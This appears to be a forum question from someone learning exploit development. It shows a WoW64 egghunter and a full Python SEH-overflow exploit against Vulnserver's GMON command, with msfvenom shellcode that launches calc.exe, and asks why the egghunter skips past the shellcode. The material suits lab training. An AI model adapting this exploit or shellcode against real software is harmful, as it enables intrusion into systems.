# WoW64 Egghunter not finding shellcode in Vulnserver on Windows 10

Tags: windows, overflow, seh

Im trying to use a WoW64 egghunter to exploit the GMON SEH overflow in vulnserver on windows 10 64bit.

I finally managed to find an egghunter that doesnt crash on windows 10 but now it goes right past the location of my shellcode when searching. i know the egghunter gets executed so its not any sort of issue with my jumps/returns being off.
(i also know i dont actually need to use an egghunter here but i wanted to learn about using one)

this is the egghunter im using:

```
0:  8c cb                   mov    ebx,cs
2:  80 fb 23                cmp    bl,0x23
5:  33 d2                   xor    edx,edx
7:  66 81 ca ff 0f          or     dx,0xfff
c:  33 db                   xor    ebx,ebx
e:  42                      inc    edx
f:  52                      push   edx
10: 53                      push   ebx
11: 53                      push   ebx
12: 53                      push   ebx
13: 6a 29                   push   0x29
15: 58                      pop    eax
16: b3 c0                   mov    bl,0xc0 ; Heaven's gate
18: 64 ff 13                call   DWORD PTR fs:[ebx]
1b: 83 c4 0c                add    esp,0xc
1e: 5a                      pop    edx
1f: 3c 05                   cmp    al,0x5
21: 74 e4                   je     0x7
23: b8 77 30 30 74          mov    eax,0x74303077
28: 89 d7                   mov    edi,edx
2a: af                      scas   eax,DWORD PTR es:[edi]
2b: 75 e1                   jne    0xe
2d: af                      scas   eax,DWORD PTR es:[edi]
2e: 75 de                   jne    0xe
30: ff e7                   jmp    edi
```

and this is my python code that sends the SEH exploit:

```
#!/usr/bin/env python2
#SEH exploit of GMON command
from socket import AF_INET,SOCK_STREAM,socket,timeout

#command to execute
command="GMON /"

#egghunter to find shellcode after "w00tw00t"
egg=""
egg+="\x8C\xCB\x80\xFB\x23\x33\xD2\x66\x81\xCA\xFF\x0F"
egg+="\x33\xDB\x42\x52\x53\x53\x53\x6A\x29\x58\xB3\xC0"
egg+="\x64\xFF\x13\x83\xC4\x0C\x5A\x3C\x05\x74\xE4\xB8"
egg+="\x77\x30\x30\x74\x89\xD7\xAF\x75\xE1\xAF\x75\xDE"
egg+="\xFF\xE7"

#padding between egghunter and shellcode
pad="A"*1000

#msfvenom -p windows/exec cmd=calc.exe -b "\x00" -f python
buf =  "w00tw00t"
buf += "\xda\xd5\xba\xc8\x9b\x1e\xa7\xd9\x74\x24\xf4\x58\x33"
buf += "\xc9\xb1\x31\x83\xe8\xfc\x31\x50\x14\x03\x50\xdc\x79"
buf += "\xeb\x5b\x34\xff\x14\xa4\xc4\x60\x9c\x41\xf5\xa0\xfa"
buf += "\x02\xa5\x10\x88\x47\x49\xda\xdc\x73\xda\xae\xc8\x74"
buf += "\x6b\x04\x2f\xba\x6c\x35\x13\xdd\xee\x44\x40\x3d\xcf"
buf += "\x86\x95\x3c\x08\xfa\x54\x6c\xc1\x70\xca\x81\x66\xcc"
buf += "\xd7\x2a\x34\xc0\x5f\xce\x8c\xe3\x4e\x41\x87\xbd\x50"
buf += "\x63\x44\xb6\xd8\x7b\x89\xf3\x93\xf0\x79\x8f\x25\xd1"
buf += "\xb0\x70\x89\x1c\x7d\x83\xd3\x59\xb9\x7c\xa6\x93\xba"
buf += "\x01\xb1\x67\xc1\xdd\x34\x7c\x61\x95\xef\x58\x90\x7a"
buf += "\x69\x2a\x9e\x37\xfd\x74\x82\xc6\xd2\x0e\xbe\x43\xd5"
buf += "\xc0\x37\x17\xf2\xc4\x1c\xc3\x9b\x5d\xf8\xa2\xa4\xbe"
buf += "\xa3\x1b\x01\xb4\x49\x4f\x38\x97\x07\x8e\xce\xad\x65"
buf += "\x90\xd0\xad\xd9\xf9\xe1\x26\xb6\x7e\xfe\xec\xf3\x71"
buf += "\xb4\xad\x55\x1a\x11\x24\xe4\x47\xa2\x92\x2a\x7e\x21"
buf += "\x17\xd2\x85\x39\x52\xd7\xc2\xfd\x8e\xa5\x5b\x68\xb1"
buf += "\x1a\x5b\xb9\xd2\xfd\xcf\x21\x3b\x98\x77\xc3\x43"

#padding to seh
pad1="B"*(3545-len(egg+pad+buf))

jmp="\xE9\x22\xF2\xFF\xFF"   #jmp $-3545 to start of shellcode
nseh="\xEB\xF9\x90\x90"      #jmp $-5 to near jmp
seh="\xB4\x10\x50\x62"       #pop pop ret to nseh

post="C"*(5000-len(egg+pad+buf+pad1+jmp+seh+nseh))
message=command+egg+pad+buf+pad1+jmp+nseh+seh+post

try:
    target=socket(AF_INET,SOCK_STREAM)
    target.settimeout(2)
    target.connect(('192.168.56.4', 9999))
    target.recv(512)
except timeout:
    print("Server not responding! Exiting!")
    exit()
try:
    target.send(message)
    target.recv(512)
    target.close()
except timeout:
    print("Server has crashed! Success!")
    exit()
```

the egghunter should find the "w00tw00t" in memory and execute the shellcode. instead it gives me the error:

```
access violation when reading [00001004]
```

if i tell immunity to ignore access violation errors so it keeps running then the address in the error keeps getting higher in increments of 0x00001000 until it goes right past the address where my shellcode is without stopping to execute it.